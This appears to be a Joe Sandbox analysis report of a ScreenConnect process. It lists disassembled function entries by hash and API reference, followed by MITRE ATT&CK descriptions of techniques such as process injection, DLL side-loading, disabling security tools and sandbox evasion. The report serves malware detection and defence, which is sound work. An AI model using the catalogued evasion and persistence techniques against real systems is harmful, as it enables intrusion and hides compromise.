Opcode ID: 27bb8724100f8dd652d90309fdf5fa1cbad8b9ccf6af2087ff5c3e8218ba63d8
Instruction ID: ec1208ac109cb042145f516ae047f2836e93239ef8da8b54e51a2eb55acf4182
Opcode Fuzzy Hash: 27bb8724100f8dd652d90309fdf5fa1cbad8b9ccf6af2087ff5c3e8218ba63d8
Instruction Fuzzy Hash: 20412731E0DB594FDB29AFA89C4A5E97BE0EF59310F04017FE049C3192DA78A8468BD1

Function 00007FFD9B8B3662 Relevance: 1.6, APIs: 1, Instructions: 121
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConnectNamedPipe.KERNELBASE ref: 00007FFD9B8D5AAF

Memory Dump Source

Source File: 00000009.00000002.3556873902.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: ConnectNamedPipe
String ID:
API String ID: 2191148154-0
Opcode ID: 3ec03ebf605ca34d3bb28978c601820cc85bd98115250cb1783d08b867563e48
Instruction ID: 7e89f71befc94dba92bbc52db4cd8e788e77bf8f7103882979c5f345e867259f
Opcode Fuzzy Hash: 3ec03ebf605ca34d3bb28978c601820cc85bd98115250cb1783d08b867563e48
Instruction Fuzzy Hash: 70315C70A08A1C8FDB58EF98D849BE9B7F1FB98311F00826AD04DD7255DB74A9858B81

Function 00007FFD9B8B3AA2 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8B8142

Memory Dump Source

Source File: 00000009.00000002.3556873902.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: eba4cd86462c3d6c187c5c2b3b35a412cf66c0fad2dfba896af6d700ab5971db
Instruction ID: 785586ac2d8684df8fdcd50e4750c44e14e4d59d0c1997d1761efdc73d52abe6
Opcode Fuzzy Hash: eba4cd86462c3d6c187c5c2b3b35a412cf66c0fad2dfba896af6d700ab5971db
Instruction Fuzzy Hash: 1321A771918B188FDB28AF9D9C4AAF977E0EB69711F00412EE049D3251DB74B8468B91

Function 00007FFD9BBC4765 Relevance: .4, Instructions: 411
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2fd51082ced0af7f9832a6cce2a04da0c4d6f4adb0093968b903227d66ce50
Instruction ID: e23f4c0dced0699356939c317ea553e2e40545db93bece24fba6923dc694e232
Opcode Fuzzy Hash: 7d2fd51082ced0af7f9832a6cce2a04da0c4d6f4adb0093968b903227d66ce50
Instruction Fuzzy Hash: 32C14932B0EA4A0FEB68FA6C84A14B577A1FF55354B05017ED48D831D7EE24BA0AC780

Function 00007FFD9BBC38F2 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 379a8a229d4ecae2b4119165fb6d399c76d7e0171fe89e704e12038e658fc166
Instruction ID: b3b205b1e677a22024a9c64dbcda4acd64c82aef4df65ba56c10fbefdbfbe34a
Opcode Fuzzy Hash: 379a8a229d4ecae2b4119165fb6d399c76d7e0171fe89e704e12038e658fc166
Instruction Fuzzy Hash: C9A15E34709A4A8FDBDDEF6CC0A16A177A1FF9930876405B9C059CB29BDA35E846C780

Function 00007FFD9BBC2129 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831f12be6bc8f5aa6e77932cf4d93ecd6ef392e5404f02092dc183a2da5a4cc4
Instruction ID: bb2478a7d34848d100105028504ea58457f9155eef5efb1a9e02bcd2343f1239
Opcode Fuzzy Hash: 831f12be6bc8f5aa6e77932cf4d93ecd6ef392e5404f02092dc183a2da5a4cc4
Instruction Fuzzy Hash: 8F61D572B0DA494FDB98EF6C8461A7977D2FFA4314B0501A9D49ECB2D6DD25F802C740

Function 00007FFD9BBC7CBD Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c1f3251ce906e896df6e3ba193feb36cb4bc52e262818aeeb88e77a8a966a8e
Instruction ID: 4ec0b0b18bc9a80c19b5c858599cf8070fe080c3d2390415d7a5f05fd2761cbd
Opcode Fuzzy Hash: 6c1f3251ce906e896df6e3ba193feb36cb4bc52e262818aeeb88e77a8a966a8e
Instruction Fuzzy Hash: BE512673B0EA4E4BEB65EE9E98640F977A1FF94314F0501BAE05CC31E2DE246906C741

Function 00007FFD9BBC4D79 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d4e8082eb17b20efab44d4255194f6219c339c022a4d739cda6a15b710e0dcf
Instruction ID: 5f6977000e8ef6c0b35af661595e1f255a8668574e7ea8b67ec7e5bf355e0435
Opcode Fuzzy Hash: 2d4e8082eb17b20efab44d4255194f6219c339c022a4d739cda6a15b710e0dcf
Instruction Fuzzy Hash: EF417571709A4E4FDB98DF18C8A4AB537A1FF58318B1505ADE41EC72E2CB35E952CB40

Function 00007FFD9BBC3FF5 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db47be2d6e0a5b629efff4a6835da9d8051a47419585ef0b0395a692a5aef42c
Instruction ID: 9bfe8c1f598c1e3fb954bd742ef951dd94c0c4f274c7e2589b95160dfe451a93
Opcode Fuzzy Hash: db47be2d6e0a5b629efff4a6835da9d8051a47419585ef0b0395a692a5aef42c
Instruction Fuzzy Hash: 4B310B5274FACA0FD7A6E77C48395B43FA1EFA614470941FBC088CB1E3DA18690AC301

Function 00007FFD9BBC34C5 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdaeb0e6e2b61588c17f1c79f1566352761c7d414d491f0ce3877755e6bb912f
Instruction ID: 0acb01af973fcf5d55e0281ccf0cfdad6eddd0921f834614f6b9a03d1ca94f63
Opcode Fuzzy Hash: fdaeb0e6e2b61588c17f1c79f1566352761c7d414d491f0ce3877755e6bb912f
Instruction Fuzzy Hash: 6931B13250E3D5AFC317ABA8D8A58D57FB0EF0321871A01E7D0D9CB0B3DA29694AC751

Function 00007FFD9BBC81C9 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ea081daa12a0eed1bdaea6150d1c5772e193f883dd321e7b0b0bb380911069
Instruction ID: 7c061de60db27c0bca46ad84dffca401f3f0d6e68a4b34b8446b1eb28cbe5393
Opcode Fuzzy Hash: 50ea081daa12a0eed1bdaea6150d1c5772e193f883dd321e7b0b0bb380911069
Instruction Fuzzy Hash: 5731A632F0EE4D4BEBA5EA585C351F83B91FF45354F0601ABE54CCB1E2DA29A900C741

Function 00007FFD9BBC7E7A Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d566ebb0ee0932a44c484b10142a8387a1d3899f6ab053384965c2a39bb5d60a
Instruction ID: 3299959c14f1541265a5274b86f6856498170fd90737aa6b830fe36efb1c259d
Opcode Fuzzy Hash: d566ebb0ee0932a44c484b10142a8387a1d3899f6ab053384965c2a39bb5d60a
Instruction Fuzzy Hash: 63215C3260DA8E4FD369EB799C644A57BE1FF85324B0505BAD08DC31E2DB28A802C741

Function 00007FFD9BBC6C25 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b08a0f03620866405d3956ce53de0c05068313f8b0dffc25d4884273910a8f5
Instruction ID: b9e0cce4d284d2c173b37e245b666495475565c28e1eda04839358209aa92887
Opcode Fuzzy Hash: 4b08a0f03620866405d3956ce53de0c05068313f8b0dffc25d4884273910a8f5
Instruction Fuzzy Hash: 4821A120B0E51A0EE769E7AD4470AB66692EFA9208F5640BAD44EC72F3DD58AD06C350

Function 00007FFD9BBC0370 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 741404673f0752a9f8a0938b4569ed52f9b4f8149da55c554ffbc18c5dc5c0ff
Instruction ID: 8fba19fdc573e889ac4e1bb46358b6e6d0e234294e8289c8300694ace19f7919
Opcode Fuzzy Hash: 741404673f0752a9f8a0938b4569ed52f9b4f8149da55c554ffbc18c5dc5c0ff
Instruction Fuzzy Hash: 971193317099084FE7A4EA6CD469A75B3D1FBA8319B14057AD84EC72E5DE26AD40C740

Function 00007FFD9BBC4C0D Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5be1b178d98e6885ded614b70dbb52e85afc02993a7561ca7bb01a5de3c75f7b
Instruction ID: d09d41fea946d95f06a5894ff333b677ac6aeec76ccf9f43f5f45e12017da2d4
Opcode Fuzzy Hash: 5be1b178d98e6885ded614b70dbb52e85afc02993a7561ca7bb01a5de3c75f7b
Instruction Fuzzy Hash: 1D117572E0EB4C4BDFA1EB5958751A97FA1FF59304F06009EE158C32F3DA656600CB42

Function 00007FFD9BBC58BC Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0c991585903dd07eb045c3f2ffdc08fcfd5870d315d4564a56547a0ebd6035
Instruction ID: 2c34b3ce8825cd9bff491dafd501ebf2af7dfa7d1d8967ed17806d22221c7d74
Opcode Fuzzy Hash: 4e0c991585903dd07eb045c3f2ffdc08fcfd5870d315d4564a56547a0ebd6035
Instruction Fuzzy Hash: 1911B420B0AA1F0AFFB9EB9C44726B412C1FF99308F8902B9D44FCA1E7CD18A905C651

Function 00007FFD9BBC2257 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd2fb1965d7cfbb45d330da390aaf4f26c9c88ba2a0a98aad6a3b025ced8dba
Instruction ID: b5ab09912f645541064314523827c141e944ed552c2a8702c1dc96237ee530d9
Opcode Fuzzy Hash: 6fd2fb1965d7cfbb45d330da390aaf4f26c9c88ba2a0a98aad6a3b025ced8dba
Instruction Fuzzy Hash: 8A117F71B099094FDB98EF58C464B6977E1FF58304B0541B8C44ECB2D6DA25E942C740

Function 00007FFD9BBC22C0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213514cd8461c180cdf3e0d5665bffc6247ab90361044101b1be9b7d85041465
Instruction ID: 47ec7d855299a0e327dc0a913bd5dec69de9be04334e72d289fb4591f48180e8
Opcode Fuzzy Hash: 213514cd8461c180cdf3e0d5665bffc6247ab90361044101b1be9b7d85041465
Instruction Fuzzy Hash: 60118E71B099494FDB98EF58C464B6977E2FF68304B0541F8C44ECB2D6DA35E902CB80

Function 00007FFD9BBC4109 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea04bc3ebf12441ee6e6341bdd8872bd25e244e35fe6e62fae8ea1f8026102bc
Instruction ID: d8996a4967a566dbcf079229dc379f6b62d1e18ff6d116a64669abbe41d24464
Opcode Fuzzy Hash: ea04bc3ebf12441ee6e6341bdd8872bd25e244e35fe6e62fae8ea1f8026102bc
Instruction Fuzzy Hash: E4119115B0EA5B0AE7B9A36944723756AE1AFA5244F0A80BEC489C61E6DC1C9E81C351

Function 00007FFD9BBC3489 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3429d18ce8b4b77b9e51f210e2dd7662d804663703747378ff31432f38b4db4
Instruction ID: 9714cd8217d0c139bb9251d41c6bbfa6d929a94c8ccacac94d3160aeed2eedfa
Opcode Fuzzy Hash: f3429d18ce8b4b77b9e51f210e2dd7662d804663703747378ff31432f38b4db4
Instruction Fuzzy Hash: FAF0923540D68C9FCF42EB64E0908D67F70EE56320B1501C7E049CB062E7318A5ACB82

Function 00007FFD9BBC0DE0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c7ac0f859a0681713cfbe06a9491ed311f9ee8acb3740e11d9f40f72b03937c
Instruction ID: 4e08fb672b6779c0f1677f352f42d57d07f6fae58575ad301cbc43ae11e5f73b
Opcode Fuzzy Hash: 0c7ac0f859a0681713cfbe06a9491ed311f9ee8acb3740e11d9f40f72b03937c
Instruction Fuzzy Hash: 6EE04F3150951C9FCB15FB68E455CEA7764EF15319B414197E00EC70A2DA22A954CBC1

Function 00007FFD9BBC4120 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f94d5de7df430545685c9f51e3a095308c40ae0ca4c940ff76b4a1f3b81f7f
Instruction ID: 6160abce2fcac0f176fb393e85c74cae05bad3c9619d7d21fe9f39ad2502bcc0
Opcode Fuzzy Hash: 58f94d5de7df430545685c9f51e3a095308c40ae0ca4c940ff76b4a1f3b81f7f
Instruction Fuzzy Hash: 13E08615B4E61B02FB7C72B968A23B554A19F44315F06507ED46D814D5CC5C9E808151

Function 00007FFD9BBC7BFA Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45438f274deab3eaa6a71c75f383482671f63560d11a9941d399624cd34a729d
Instruction ID: 5e3d024b85d12f68b79832f35e91932665566bf95994fea9f6f9df1c8309070e
Opcode Fuzzy Hash: 45438f274deab3eaa6a71c75f383482671f63560d11a9941d399624cd34a729d
Instruction Fuzzy Hash: E4D0A543756C4F0BD5E4F64C34513F502C2D7DC5607450072D80CC61D6DC059DC243C0

Function 00007FFD9BBC235F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e98579236f67fda3ad1d02814725d4cf80b0324f5bd8e081a4791b18c58a08
Instruction ID: 138235da7d38fe56194681e9ff513a5931f6b6c14e9b61f320f075d23ccb774b
Opcode Fuzzy Hash: 49e98579236f67fda3ad1d02814725d4cf80b0324f5bd8e081a4791b18c58a08
Instruction Fuzzy Hash: 83C09B50F1B55E46F165FBB984712BE11527F8D604F524435D00D811E6CD3CA7015985

Function 00007FFD9BBC20A1 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3565438348.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbc0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f83e2d0c3d7cea83cd36b56dc91d20c34eacba4b5a54dba9ee974d8d0d571de
Instruction ID: 93589227ca881e984b5d65b02d6845e4d0a9b693a991bab6c4177ad9c8c8ff38
Opcode Fuzzy Hash: 0f83e2d0c3d7cea83cd36b56dc91d20c34eacba4b5a54dba9ee974d8d0d571de
Instruction Fuzzy Hash: 6CA00240F0F92E45E0B1F6EA402127E40411F4A604B225139D00E911F6CD2CAB4255D6

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
